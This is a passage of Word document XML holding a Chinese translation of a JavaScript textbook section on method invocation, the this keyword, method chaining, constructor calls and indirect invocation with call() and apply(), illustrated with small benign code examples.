    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面的代码是一个调用表达式：它包括一个函数表达式</w:t>
      </w:r>
      <w:r>
        <w:t>o.m</w:t>
      </w:r>
      <w:r>
        <w:t>，以及两个实参表达式</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>，函数表达式本身就是一个属性访问表达式（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），这意味着该函数被当做一个方法，而不是作为一个普通函数来调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对方法调用的参数和返回值的处理，和上面所描述的普通函数调用完全一致。但是，方法调用和函数调用有一个重要的区别，即：调用上下文。属性访问表达式由两部分组成：一个对象（本例中的</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>）和属性名称（</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>）。在像这样的方法调用表达式里，对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>成为调用上下文，函数体可以使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>引用该对象。下面是一个具体的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> calculator={//</w:t>
      </w:r>
      <w:r>
        <w:t>对象直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>operand1:1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>operand2:1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的用法，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指代当前对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.result=this.operand1+this.operand2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>calculator.add();//</w:t>
      </w:r>
      <w:r>
        <w:t>这个方法调用计算</w:t>
      </w:r>
      <w:r>
        <w:t>1+1</w:t>
      </w:r>
      <w:r>
        <w:t>的结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>calculator.result//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数方法调用使用点符号来访问属性，使用方括号（的属性访问表达式）也可以进行属性访问操作。下面两个例子都是函数调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o["m"](x,y);//o.m(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>的另外一种写法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[0](z)//</w:t>
      </w:r>
      <w:r>
        <w:t>同样是一个方法调用（这里假设</w:t>
      </w:r>
      <w:r>
        <w:t>a[0]</w:t>
      </w:r>
      <w:r>
        <w:t>是一个函数）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法调用可能包括更复杂的属性访问表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>customer.surname.toUpperCase();//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>customer.surname</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f().m();//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>调用结束后继续调用返回值中的方法</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字是面向对象编程范例的核心。任何函数只要作为方法调用实际上都会传入一个隐式的实参</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这个实参是一个对象，方法调用的母体就是这个对象。通常来讲</w:t>
      </w:r>
      <w:r>
        <w:t>，基于那个对象的方法可以执行多种操作，方法调用的语法已经很清晰地表明了函数将基于一个对象进行操作，比较下面两行代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>rect.setSize(width,height);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setRectSize(rect,width,height);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我们假设这两行代码的功能完全一样，它们都作用于一个假定的对象</w:t>
      </w:r>
      <w:r>
        <w:t>rect</w:t>
      </w:r>
      <w:r>
        <w:t>。可以看出，第一行的方法调用语法非常清晰地表明这个函数执行的载体是</w:t>
      </w:r>
      <w:r>
        <w:t>rect</w:t>
      </w:r>
      <w:r>
        <w:t>对象，函数中的所有操作都将基于这个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>方法链</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当方法的返回值是一个对象，这个对象还可以再调用它的方法。这种方法调用序列中（通</w:t>
      </w:r>
      <w:r>
        <w:t>常称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>级联</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）每次的调用结果都是另外一个表达式的组成部分。比如，基于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>库（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章），我们常常会这样写代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>找到所有的</w:t>
      </w:r>
      <w:r>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:t>，取得它们</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>的映射，转换为数组并对它们进行排序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(":header").map(function(){return this.id}).get().sort();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当方法并不需要返回值时，最好直接返回</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>。如果在设计的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中一直采用这种方式（每个方法都返回</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>），使用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>就可以进行</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链式调用</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>风格的编程，在这种编程风格中，只要指定一次要调用的对象即可，余下的方法都可以基于此进行调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>shape.setX(100).setY(100).setSize(50).setOutline("red").setFill("blue").draw();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>不要将方法的链式调用和构造函数的链式调用混为一谈，</w:t>
      </w:r>
      <w:r>
        <w:t>9.7.2</w:t>
      </w:r>
      <w:r>
        <w:t>节将会讨论构造函数的链式调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>是一个关键字，不是变量，也不是属性名。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的语法不允许给</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>赋值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和变量不同，关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>没有作用域的限制，嵌套的函</w:t>
      </w:r>
      <w:r>
        <w:t>数不会从调用它的函数中继承</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>。如果嵌套函数作为方法调用，其</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值指向调用它的对象。如果嵌套函数作为函数调用，其</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值不是全局对象（非严格模式下）就是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>（严格模式下）。很多人误以为调用嵌套函数时</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>会指向调用外层函数的上下文。如果你想访问这个外部函数的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值，需要将</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值保存在一个变量里，这个变量和内部函数都同在一个作用域内。通常使用变量</w:t>
      </w:r>
      <w:r>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:t>来保存</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={//</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>m:function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的方法</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var self=</w:t>
      </w:r>
      <w:r>
        <w:t>this;//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值保存至一个变量中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(this===o);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>就是这个对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f();//</w:t>
      </w:r>
      <w:r>
        <w:t>调用辅助函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个嵌套函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(this===o);//"false":this</w:t>
      </w:r>
      <w:r>
        <w:t>的值是全局对象或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(self===o);//"true":self</w:t>
      </w:r>
      <w:r>
        <w:t>指外部函数的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值</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o.m();//</w:t>
      </w:r>
      <w:r>
        <w:t>调用对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
      <w:r>
        <w:t>m()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.4</w:t>
      </w:r>
      <w:r>
        <w:t>节的例</w:t>
      </w:r>
      <w:r>
        <w:t>8-5</w:t>
      </w:r>
      <w:r>
        <w:t>中有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>self=this</w:t>
      </w:r>
      <w:r>
        <w:t>更切合实际的用法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="8_2_3_Gou_Zao_Han_Shu_Diao_Yong_"/>
      <w:r>
        <w:t>8.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　构造函数调用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果函数或者方法调用之前带有关键字</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>，它就构成构造函数调用（构造函数调用在</w:t>
      </w:r>
      <w:r>
        <w:t>4.6</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>6.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节有简单介绍，第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章会对构造函数做更详细的讨论）。构造函数调用和普通的函数调用以及方法调用在实参处理、调用上下文和返回值方面都有不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果构造函数调用在圆括号内包含一组实参列表，先计算这些实参表达式，然后传入函数内，这和函数调用和方法调用是一致的。但如果构造函数没有形参，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数调用的语法是允许省略实参列表和圆括号的。凡是没有</w:t>
      </w:r>
      <w:r>
        <w:t>形参的构造函数调用都可以省略圆括号，比如，下面这两行代码就是等价的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=new Object();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=new Object;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数调用创建一个新的空对象，这个对象继承自构造函数的</w:t>
      </w:r>
      <w:r>
        <w:t>prototype</w:t>
      </w:r>
      <w:r>
        <w:t>属性。构造函数试图初始化这个新创建的对象，并将这个对象用做其调用上下文，因此构造函数可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>引用这个新创建的对象。注意，尽管构造函数看起来像一个方法调用，它依然会使用这个新对象作为调用上下文。也就是说，在表达式</w:t>
      </w:r>
      <w:r>
        <w:t>new o.m()</w:t>
      </w:r>
      <w:r>
        <w:t>中，调用上下文并不是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数通常不使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，它们通常初始化新对象，当构造函数的函数体执行完毕时，它会显式返回。在这种情况下，构造函数调用表达式的计算结果就是这个新对象的值。然而如果构造函数显式地使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句返回一个对象，那么调用表达式的值就是这个对象。如果构造函数使用</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句但没有指定返回值，或者返回一个原始值，那么这时将忽略返回值，同时使用这个新对象作为调用结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="198" w:name="8_2_4_Jian_Jie_Diao_Yong_"/>
      <w:r>
        <w:t>8.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　间接调用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数也是对象，和其他</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象没什么两样，函数对象也可以包含方法。其中的</w:t>
      </w:r>
      <w:r>
        <w:t>两个方法</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>可以用来间接地调用函数。两个方法都允许显式指定调用所需的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>值，也就是说，任何函数可以作为任何对象的方法来调用，哪怕这个函数不是那个对象的方法。两个方法都可以指定调用的实参。</w:t>
      </w:r>
      <w:r>
        <w:t>ca ll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用它自有的实参列表作为函数的实参，</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>则要求以数组的形式传入参数。</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会有关于</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的详细讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
